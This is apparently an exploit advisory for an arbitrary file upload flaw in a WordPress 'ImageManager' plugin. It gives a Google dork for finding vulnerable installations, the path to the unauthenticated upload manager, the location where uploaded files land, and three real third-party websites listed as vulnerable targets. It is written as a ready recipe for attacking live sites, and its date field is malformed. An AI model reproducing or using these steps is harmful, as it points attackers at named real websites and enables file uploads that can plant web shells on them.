============================================================================
# Exploit Title: WordPress Plugins ImageManager- Arbitrary File Upload     
# Date: 04/11/017                                                      
# Exploit Author: j!h4dDZ                                                  
# Tested on: Windows 7                                                   
============================================================================
1)---------- Search target with Google Dorking-----------------------------
inurl:wp-content/plugins/ImageManager/manager.php
Index of wp-content/plugins/ImageManager/manager.php
---------------------------------------------------------------------------
2)--------------------Exploit the websites---------------------------------
-----------------------File Upload-----------------------------------------
(PoC)

http://localhost/wp-content/plugins/ImageManager/manager.php


----------------------------------------------------------------
http://www.lesnap.com/wp-content/plugins/ImageManager/manager.php
http://www.magicrelationship.net/blog/wp-content/plugins/ImageManager/manager.php
http://www.trejosolutions.com/blog/wp-content/plugins/ImageManager/manager.php
------------------------------------------------------------------------------


3) --------------------------Location File:----------------------------------
http://localhost/wp-content/uploads/.thumbs/.FILE.jpg
------------------------------------------------------------------------------